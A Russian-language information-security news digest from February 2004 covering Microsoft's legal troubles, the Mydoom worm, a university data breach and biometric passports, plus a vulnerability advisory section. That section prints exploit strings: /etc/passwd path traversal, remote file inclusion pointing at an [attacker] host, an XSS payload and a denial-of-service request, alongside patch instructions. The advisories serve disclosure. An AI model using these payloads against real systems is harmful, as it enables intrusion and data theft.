Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

15 новостей по информационной безопасности каждый день


Информационный Канал Subscribe.Ru


Новости информационной безопасности Стратег.Ру
Ekey.ru Удостоверяющий Центр"

1.2.2004 - 2.2.2004

Содержание


Регулирование: Законы, постановления, сертификация, контроль

Уничтожить «Lindows» за 8 дней

2 февраля | runet.ru

Отныне голландские дистрибьюторы не могут перепродавать Lindows. Корпорация Microsoft добилась признания того, что Lindows OS и Lindows.com вводят потребителей в заблуждение.

«Прибыли Lindows незаконны так, как базируются на успехе Windows. Дело в том, что Lindows.com позиционируют свой продукт, смешивая два бренда -  Windows и Linux», - утверждается в судебном постановлении.
 
Четыре голландских дистрибьютора обязаны прекратить перепродажу и рекламу Lindows в течение 8 дней. Кроме того, веб-ресурс Lindows.com должен быть не доступен пользователям из стран Бенилюкса.

Данный вердикт подобен тому, который вынесли в Финляндии и Швеции.    

Lindows.com может изменить имя для Бельгии, Нидерландов и Люксембурга. Однако адвокат компании заявил, что данный шаг маловероятен. Продажи Lindows.com в странах Бенилюкса не столь высоки, - сообщает Neowin.Net .

Microsoft обвинили в сотрудничестве с китайскими спецслужбами

2 февраля | http://www.crime-research.ru/

Американская компания Microsoft обвинена в способствовании введению цензуры в интернете, нарушении прав человека, а также пособничестве китайским спецслужбам, сообщает The Observer. Эти обвинения содержатся в докладе правозащитной организации "Международная амнистия" (Amnesty International), опубликованном в воскресенье.

В докладе утверждается, что компания продала китайскому правительству ряд программных технологий, которые используются спецслужбами Китая для отслеживания инакомыслящих интернет-пользователей. Авторы доклада также приводят информацию о большом количестве китайских диссидентов, отловленных и посаженных в тюрьму благодаря ПО Microsoft.

Представители организации полагают, что компания Билла Гейтса нарушает соответствующие статьи кодекса ООН о правах человека ("товары и услуги торговых организаций не должны быть направлены на ущемление прав человека"), и предостерегает прочих производителей программного обеспечения от сотрудничества с китайскими властями.

Известно, что в КНР уровень цензуры в интернете является самым высоким в мире. Так, в стране запрещены сайты, где упоминаются такие слова, как "Тайвань", "Тибет", "демократия", "диссидент", "права человека".

Тем временем, руководство компании Microsoft отвергло все выдвинутые в ее адрес обвинения. В ответном заявлении сообщается, что корпорация производит и продает программы для работы в интернете, но не может контролировать то, каким образом ее ПО используется потребителями.

Евросоюз оштрафует Microsoft на $3.2 млрд.

2 февраля | astera

Гигантский штраф в $3.2 млрд. грозит американскому электронному гиганту Microsoft со стороны Еврокомиссии. Высший исполнительный орган Евросоюза последние три года вел расследование монополистической практики этой компании. Данную цифру, представляющую 10% от доходов Microsoft во всем мире в прошлом году, назвали сегодня источники в ЕС.

Антимонопольный комитет ЕС уже закончил расследование. Сейчас его выводы о необходимости наложения штрафа на американскую компанию и его конкретные размеры, направлены на утверждение высшего руководства Евросоюза.

Microsoft обвиняется в том, что он включил позволяющую просматривать видеофильмы программу Media Player в операционную систему Windows. В результате этого другие компании не могут конкурировать с Microsoft в этом быстро растущем секторе мультимедиа.

Наряду с этим стало известно, что адвокаты Microsoft сейчас пытаются добиться снижения размера штрафа и дают обязательства по изменению ряда своих программ, сообщает ИТАР-ТАСС.

 


Проблемные ситуации, информационная преступность, сетевые войны

20000 американских студентов рискуют стать жертвами онлайновых мошенников

2 февраля | http://www.crime-research.ru/

Администрация университета Джорджии заявила, что хакеры получили доступ к ключевой информации двадцати тысяч учащихся, включая номера их кредиток и карт социального страхования. Предупреждение о чрезвычайной ситуации было вызвано следующими фактами.

Технические специалисты обнаружили, что взломщики использовали компьютерную сеть вуза для сканирования и исследования других систем в Интернете на предмет возможных атак. Пока никаких признаков кражи личной информации не найдено.

Тем не менее, опасность существует, поэтому власти учебного заведения не исключают возможность будущего преступления. Сообщается, что хакеры получили доступ к таким сведениям, как имена, даты рождения, номера карточек социального обеспечения, информация о родителях, номера кредиток, а также заявления о приеме.

По свидетельству InformationWeek.Com , администрация университета попыталась установить контакт со всеми студентами, которые могут стать жертвами мошенников. В помощь учащимся был запущен специальный веб-сайт.


Информационая безопасность государственной власти

США: система киберпространственного предупреждения

2 февраля | http://www.crime-research.ru/

На этой неделе под эгидой министерства внутренней безопасности США начала работать правительственная компьютерная программа "Национальная система киберпространственного предупреждения", которая должна помочь американцам в отражении атак хакеров или террористов на индивидуальные компьютеры и компьютерные сети.

Каждый владелец компьютера, подписавшийся на эту программу, будет получать по электронной почте предупреждения о появлении новых компьютерных вирусов и других атаках через Интернет, а также подробные инструкции по мерам защиты. По замыслу ее создателей, новая программа будет полезна, как домашним пользователям, так и компьютерным экспертам.

"Назрела явная необходимость в разработке такой системы, — заявил Амит Йоран, глава Отдела киберпространственной безопасности в администрации Буша. — Информации, получаемой непосредственно от министерства внутренней безопасности, американцы будут больше доверять".

Система киберпространственного предупреждения будет работать независимо от применяемой министерством внутренней безопасности цветовой системы, которая отражает общенациональный уровень террористической угрозы.

Йоран отметил, что правительство будет стараться давать информацию как можно быстрее и оперативно корректировать ее по мере поступления сведений от экспертов.

Однако новая система предупреждения может привести к серьезным конфликтам с ведущими разработчиками программного обеспечения, включая Microsoft, руководство которого требует не разглашать обнаруженные недостатки в системе безопасности новых программ до тех пор, пока инженеры компании не создадут очередную "заплату" и не предложат ее рядовым пользователям программы.

Трехмерный паспорт

2 февраля | astera

Трехмерное изображение вашего лица вскоре может стать единственным персональным идентификатором, который вам понадобится.

Компании DuPont Authentication Systems и A4Vision разработали биометрическое устройство безопасности, которое генерирует трехмерные изображения-портреты, похожие на голограммы. Устройство Enrollment Station компании A4Vision позволяет получить такое изображение на пленку, называемую Izon, и зарегистрировать его в цифровую базу данных за 10 секунд.

Трехмерное изображение может вставляться в карточки или паспорта, последующего сканирования достаточно для точной идентификации. Биометрические данные в трехмерных изображениях более точны, поскольку содержат информацию по трем осям вместо двух. Однажды сфотографированный и зарегистрированный в базе данных человек затем может быть опознан при приближении к камере в течение 5 секунд с расстояния 6.5 футов.


Информационая безопасность общественной коммуникации, личности.

СПАМ ДЛЯ ДОБРОВОЛЬЦЕВ

2 февраля | park.ru

НОВОСИБИРСК - Компания "Сибиус" придумала оригинальный способ рассылки рекламы владельцам мобильных телефонов. "Сибиус" будет отправлять рекламные SMS-сообщения тем абонентам новосибирского филиала оператора "Мобильные ТелеСистемы" (МТС), кто даст на это согласие. В награду добровольцы получат скидки на посещение увеселительных заведений.
  ... Новосибирские абоненты МТС отреагировали на нововведение по-разному. Так, 22-летняя Юля новой услуге обрадовалась. "Мне постоянно необходима информация о распродажах и новых поступлениях в магазинах", - говорит она. А вот 27-летняя Елена негодует, называя рассылку "откровенной ерундой, засоряющей память телефона". "Да пускай приходит, я буду пользоваться бонусами, а рекламу буду сразу удалять", - отвечает на это 16-летний Ян.
  Похожий опыт рассылки SMS-рекламы есть у Северо-Западного филиала "МегаФона". Два года назад компания предложила абонентам регулярно просматривать рекламу в обмен на скидку за услуги связи в 2,4 цента за каждое доставленное сообщение. Согласившись на услугу "Мобильная реклама", клиенты оператора могли ежемесячно экономить на абонентской плате до $6. Количество желающих подзаработать на чтении рекламы доходило до 120 000 человек в месяц.

Интернет не закончился в воскресенье

2 февраля | http://www.crime-research.ru/

Прогнозы о конце интернета, в связи с эпидемиями разнообразных вирусов намеченные на 1 февраля слава богу, не подтвердились на практике. Однако по мнению специалистов, только по предварительным подсчетам убытки от Mydoom составили $3 млрд. Однако суммарные убытки от атаки Mydoom a (Novarg) могут показаться детской шалостью с атаками новой версия червя Mydoom b, которая нацелена атаковать корпоративный сайт Microsoft.

Как известно, Microsoft назначил награду за информацию о вирусописателе – $500 тыс. А Билл Гейтс организовал специальный фонд для борьбы с кибертерроризмом. Сегодня многие задаются аопросом, что же это за новый вирус и кому нужно падение SCO и Microsoft? Исходя из того, что атаке червя поддаются только машины, использующие операционную систему Windows, можно предположить, что злоумышленники – сторонники «бесплатной» операционной системы Linux (ее коды открыты), фанаты которой презирают Microsoft за то, что она богата и не раскрывает своих кодов. То же теперь можно сказать про отношение безумных компьютерных гениев к Unix: компания SCO попыталась предъявить права на некоторые части Linux, и хотя из этого у нее ничего не вышло, хакеры очень обиделись на Unix.

В компьютерном сообществе энергично обсуждаются и другие версии происхождения двух ужасных Mydoom – например, что их создали сами борцы с вирусами. Антивирусная компания «Лаборатории Касперского» в ответ на это обвинение заявила, что даже если бы она этим занималась, у нее сейчас не было бы времени на разработку новых вирусов: раньше появлялось примерно 25 «зараз» в день, а теперь – 80! «В России и без нас хватает людей, которые пишут вирусы», – заявили представители лаборатории на пресс-конференции под названием «Компьютерный терроризм: как с ним бороться».

В качестве примера кибертерроризма борцы с вирусом привели как раз Novarg. Нынешняя эпидемия – типичный теракт, то есть заранее организованная атака на невинных людей, имеющая своей целью уязвить наиболее крупных производителей программного обеспечения в мире.

Кибертеррористы своей деятельностью, помимо всего прочего, сильно замедляют скорость почтовых серверов. И если неинфицированный интернет позволяет при помощи электронной почты общаться в режиме практически онлайн, то с увеличением количества вирусных атак почтовые отправления через сеть будут доходить с той же скоростью, что и обычная почта в конверте, а то и не доходить вовсе.

Борцы с вирусами высказывают опасение, что в конце концов это может привести просто к параличу всего интернета, что пагубным образом скажется на функционировании огромного числа компаний – от транснациональных финансовых до мелких местных розничных торговцев. Бизнесмены понесут не только прямые убытки, но и косвенные – придется восстанавливать огромные объемы данных. Общие потери составят невообразимую сумму.

Интернет болен не вирусами, а вирусоманией

2 февраля | astera

Каждое из поветрий компьютерной заразы, которые реже раза в квартал теперь не случаются, приводит к вспышке типичной вирусомании. Со слов специалистов, авторитету которых нельзя не доверять, СМИ информируют граждан об угрозе Интернету и миллиардах долларов ущерба, нанесенного мировой экономике. Обыватель удручается и досадует. Криптографы и программисты в антивирусных компаниях спешно отлаживают противоядие. Системные администраторы работают интенсивнее обычного. Через неделю специалисты переводят дух, широкие массы пользователей быстро забывают о забитых почтовых ящиках - до следующего раза. Государства в происходящее почти не вмешиваются.

Генеральный директор ЗАО "ДиалогНаука" (один из двух лучших в России и нескольких в мире производителей антивирусов, его продукт защищает серверы национальной почтовой службы mail.ru) Сергей Антимонов в связи с распространением вируса Mydoom говорит следующее: "Вирус выдающийся по масштабам и скорости распространения, но не только в этом дело. Впечатляет многообразие средств, которыми воспользовались вирусописатели. Среди этих средств нет, впрочем, ни одного нового. Подготовка к атаке проведена очень тщательно, делали это явно не школьники". Руководитель информационной службы "Лаборатории Касперского" Денис Зенкин обращает внимание на то, что код вируса не поддается эвристическому анализу, и время, в течение которого специалисты по компьютерной безопасности работают над противоядием, могло быть использовано для эффективной атаки на серверы компаний SCO и Microsoft. Именно это входило в планы злоумышленников, что ясно из анализа текста вируса Mydoom.B.

Сергей Антимонов говорит в этой связи о "хрестоматийном примере терроризма". Объекты нападения - компания SCO, которая подала в суд на IBM по поводу спорных авторских прав на операционную систему Linux (исходный код Linux доступен каждому, в отличие от кода Windows), и ненавистная компьютерному андерграунду Microsoft. Ровно с теми же мотивами действует и "Аль-Каида", только против государств, а не корпораций. Пример с назначением премий за поимку авторов вирусов - за имя автора Mydoom назначено в общей сложности $500 тыс. - прямая аналогия с методами поимки террористов.

Кстати, о государствах. Американская компания Semantec, производящая среди прочего и антивирусный софт, в прошлом году первой обратилась к власти с честным заявлением, суть которого сводится к следующему: IT-бизнес не в силах обеспечить безопасность компьютерных сетей и данных, точно так же, как производители сейфов не в состоянии сделать так, чтобы в уголовном мире не стало "медвежатников".

По мнению Сергея Антимонова, проблема носит "междисциплинарный характер". Следует включать в условия лицензии интернет-провайдеров применение антивирусов на почтовых серверах, прививать населению правила информационной гигиены и, главное, исключить условия, при которых террорист в Сети имеет все возможности сохранить анонимность. В истории с эпидемией Mydoom, например, невозможно ни доказать российское происхождение вируса, ни найти преступников. Выявить их можно только с помощью людей из ближайшего окружения, в чем и должны помочь назначенные за поимку премии.

Отдельного внимания заслуживает вопрос о сумме ущерба, который оценивается, по разным данным, минимум в $2,6 млрд. Можно и нужно сомневаться в достоверности этой суммы, но, судя по многолетним результатам исследования computereconomics.com (компания публикует отчеты о потерях от вирусных атак и взлома компьютеров, ее экспертиза считается одной из самых авторитетных среди специалистов по компьютерной безопасности), финансовая оценка последствий нынешней эпидемии по меньшей мере правдоподобна. Сейчас эпидемия сходит на нет, и ждать катастрофических последствий от нее уже не стоит.

Это странно. В распоряжении хакеров оказались более полумиллиона (оценка "Лаборатории Касперского") зараженных (т.н. "зомбированных") компьютеров по всему Интернету. Авторы Mydoom все же воздержались от тщательно подготовленной атаки сайта Microsoft, которая наверняка была бы успешной. Почему? Денис Зенкин не исключает технических просчетов злоумышленников, "Известиям" же представляется более правдоподобной иная версия: попросту испугались.

 

Трехмерный паспорт

2 февраля | astera

Трехмерное изображение вашего лица вскоре может стать единственным персональным идентификатором, который вам понадобится.

Компании DuPont Authentication Systems и A4Vision разработали биометрическое устройство безопасности, которое генерирует трехмерные изображения-портреты, похожие на голограммы. Устройство Enrollment Station компании A4Vision позволяет получить такое изображение на пленку, называемую Izon, и зарегистрировать его в цифровую базу данных за 10 секунд.

Трехмерное изображение может вставляться в карточки или паспорта, последующего сканирования достаточно для точной идентификации. Биометрические данные в трехмерных изображениях более точны, поскольку содержат информацию по трем осям вместо двух. Однажды сфотографированный и зарегистрированный в базе данных человек затем может быть опознан при приближении к камере в течение 5 секунд с расстояния 6.5 футов.


Дыры и патчи программ и операционных сред

Просмотр произвольных файлов на целевой системе в 'PJreview_Neo.cgi' сценарии

2 февраля | securitylab.ru

Программа: PJreview_Neo.cgi

Опасность: Средняя

Наличие эксплоита: Да

Описание: Уязвимость обнаружена в 'PJreview_Neo.cgi' сценарии. Удаленный пользователь может просматривать файлы на целевой системе.

Пример/Эксплоит:

http://address/directory/PJreview_Neo.cgi?p=/./././././././././././././././. /etc/passwd

URL производителя:http://www.livepj.com

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Удаленное выполнение произвольных команд в 'Kietu?'

2 февраля | securitylab.ru

Программа: Kietu?

Опасность: Всокая

Наличие эксплоита: Да

Описание: Уязвимость обнаружена в 'Kietu?' web site statistics software в 'index.php'. Удаленный пользователь может выполнить произвольные команды операционной системы на целевой системе.

Пример/Эксплоит:

http://[target]/index.php?kietu[ur l_hit]=http://[attacker]/,
где 'http://[attacker]/config.php'

URL производителя:http://www.kietu.net/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Открытый пароль в BEA WebLogic Server и Express

2 февраля | securitylab.ru

Программа: BEA WebLogic Server и Express 8.1 (включая Service Pack 1).

Опасность:

Наличие эксплоита: Да

Описание: Уязвимость обнаружена в BEA WebLogic Server и Express. Локальный пользователь может просмотреть пароль администратора.

Сообщается, что файл 'config.xml' может содержать пароль администратора, используемый для загрузки сервера. Пароль хранится в открытом виде.

URL производителя:http://dev2dev.bea.com/resourcelibrary/advisoriesnotifications/BEA04_50.00.jsp

Решение:Установите Service Pack 2

Раскрытие пароля managed server локальным пользователям в BEA WebLogic

2 февраля | securitylab.ru

Программа: BEA WebLogic 8.1 (SP2 и более ранние версии), 7.0 (SP4 и более ранние версии), 6.1 (SP6 и более ранние версии)

Опасность: Низкая

Наличие эксплоита: Да

Описание: Уязвимость обнаружена в BEA's WebLogic Server и Express. Система может записать имя пользователя и пароль, используемый для запуска managed server, в файл в открытом виде.

Уязвимость происходит, когда node manager пытается запустить managed server, но managed server не запускается в самом начале процесса загрузки.

URL производителя: http://dev2dev.bea.com/resourcelibrary/advisoriesnotifications/BEA04_51.00.jsp

Решение:

For WebLogic Server and Express 8.1, upgrade to Service Pack 2 and apply the following patch:

ftp://ftpna.beasys.com/pub/releases/security/CR12 7930_81sp2.zip

The patch will be included in Service Pack 3.


For WebLogic Server and Express 7.0, upgrade to Service Pack 4 and apply the patch:

ftp://ftpna.beasys.com/pub/releases/security/CR127930_70sp4.zip

The fix will be included in Service Pack 5 is available.


For WebLogic Server and Express 6.1, upgrade to Service Pack 6 and apply the patch:

ftp://ftpna.beasys.com/pub/releases/security/CR127930_61s p6.zip

The patch will be included within Service Pack 7.

Обход ограничений безопасности в Macromedia ColdFusion MX

2 февраля | securitylab.ru

Программа: Macromedia ColdFusion MX 6.1

Опасность: Критическая

Наличие эксплоита: Нет

Описание: Уязвимость обнаружена в Macromedia ColdFusion. Java объект может обойти ограничение безопасности ограниченной среды (‘sandbox’).

Удаленный авторизованный пользователь может сконструировать JAVA объекты, которые могут проиллюстрировать (instantiate) классы, не используя тэги CreateObject () или cfobject, тем самым обходя ограничения безопасности ColdFusion MX 6.1 sandbox.

Macromedia установила опасность обнаруженной уязвимости как "critical".

URL производителя:http://www.macromedia.com/devnet/security/security_zone/mpsb04-01.html

Решение:Установите Sandbox Security patch для ColdFusion MX 6.1: http://download.macromedia.com/pub/security/mpsb04-01.zip

Удаленный отказ в обслуживании против Macromedia ColdFusion

2 февраля | securitylab.ru

Программа: Macromedia ColdFusion MX 6.1 (all editions), MX 6.1 J2EE (all editions)

Опасность: Низкая

Наличие эксплоита: Нет

Описание: Уязвимость обнаружена в Macromedia ColdFusion в обработке полей формы. Удаленный пользователь может вызвать условия отказа в обслуживании на целевой системе.

Удаленный пользователь может представить поддельный запрос, содержащий большое число (несколько тысяч) полей формы, чтобы заставить ColdFusion MX 6.1 использовать чрезмерно большое количество времени на обработку этого запроса.

URL производителя:http://www.macromedia.com/devnet/security/security_zone/mpsb04-02.html

Решение:Установите Form fields DoS patch (19 KB ZIP): http://download.macromedia.com/pub/security/mpsb04-02.zip

Отказ в обслуживании против SurfNOW proxy.

2 февраля | securitylab.ru

Программа: SurfNOW Proxy Service 2.2

Опасность: Средняя

Наличие эксплоита: Да

Описание: Уязвимость обнаружена в SurfNOW proxy. Удаленный пользователь может нарушить нормальную работу прокси сервера.

Удаленный пользователь может послать специально обработанный HTTP Get запрос к целевому серверу, чтобы вызвать условия отказа в обслуживания. Пример:

GET \aaaaaaaaaaaaa[ 490 kb of a ]aaaa HTTP/1.1\n\n\n

URL производителя: http://www.loomsoft.com/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Межсайтовый скриптинг в BRS WebWeaver

2 февраля | securitylab.ru

Программа: BRS WebWeaver 1.07

Опасность: Низкая

Наличие эксплоита: Да

Описание: Уязвимость обнаружена в BRS WebWeaver в ISAPISkeleton.dll. Удаленный пользователь может выполнить XSS нападение.

Пример/Эксплоит:

http://[target]/scripts/ISAPISkeleton.dll?<script>alert("Ooops!")</script>

URL производителя: http://www.brswebweaver.com/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Множественные уязвимости в PhpGedView

2 февраля | securitylab.ru

Программа: PhpGedView 2.65.1 и более ранние версии

Опасность: Высокая

Наличие эксплоита: Да

Описание: Несколько уязвимостей обнаружено в PhpGedView. Удаленный пользователь может выполнить произвольный PHP код и команды операционной системы на целеовой системы. Удаленный авторизованный пользователь с ”admin“ привилегиями может просматривать произвольные файлы на целевой системе.

Несколько сценариев (заканчивающихся '_conf.php') не проверяют данные, представленные пользователем в переменной $PGV_BASE_DIRECTORY. Пример:

http://[target]/[phpGedView-directory ]/index/[GED_File]_conf.php?PGV_BASE_DIRECTORY=http://attacker&THEME_DIR=/
Удаленный авторизованный пользователь с ”admin“ привилегиями может просматривать произвольные файлы на целевой системе. Пример:
http://[target]/[phpGedView-directory]/editconfig_gedcom.php?gedcom_config=././././././etc/passwd

URL производителя: http://phpgedview.sourceforge.net/

Решение:Установите обновленную версию программы: http://sourceforge.net/project/showfiles.php?group_id=55456&package_id=61562&release_id=141517

Сброс флажков безопасности в FreeBSD mksnap_ffs команде

2 февраля | securitylab.ru

Программа: FreeBSD 5.1, 5.2

Опасность: Низкая

Наличие эксплоита: Да

Описание: Уязвимость обнаружена в FreeBSD в команде 'mksnap_ffs'. Локальный пользователь может сделать снимок файловой системе со сброшенными флажками безопасности.

Локальный пользователь с root привилегиями может использовать команду mksnap_ffs(8), чтобы выполнить снимок файловой системы только с установленным флажком snapshot (все другие флажки сброшены к значениям по умолчанию).

Воздействие уязвимости зависит от конфигурации системы, например, может быть отключен расширенный список управления доступа или использование set user id (setuid) программ может быть разрешено на недоверенной файловой системы.

FreeBSd отмечает, что команда mksnap_ffs(8) доступна только для суперпользователя и членов группы operator'. В результате локальный пользователь может получить поднятые привилегии только в конфигурациях, в которых команды mksnap_ffs(8) доступна непривилегированным пользователям.

URL производителя: http://www.freebsd.org/security/

Решение:Установите соответствующее обновление:

"1) Upgrade your vulnerable system to the RELENG_5_1 or RELENG_5_2 security branch dated after the correction date.

NOTE WELL: Due to release engineering in progress at the time of this writing, the RELENG_5_2 security branch (5.2-RELEASE-p1) also includes numerous other critical bug fixes, most of which are not security related. Please read src/UPDATING for details on these changes.

2) To patch your present system:

a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility.

[FreeBSD 5.1 systems]
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patc hes/SA-04:01/mksnap_ffs_5_1.patch
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-04:01/mksnap_ffs_5_1.patch.asc

[FreeBSD 5.2 systems]
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-04:01/mksnap_ffs_5_2.patch
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-04:01/mksnap _ffs_5_2.patch.asc

b) Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch
# cd /usr/src/sbin/mksnap_ffs
# make obj && make depend && make && make install




Инструменты управления содержанием Метод.ру
Дата создания документа: 16:28 02.02.04

http://subscribe.ru/
E-mail: ask@subscribe.ru
Отписаться
Убрать рекламу

В избранное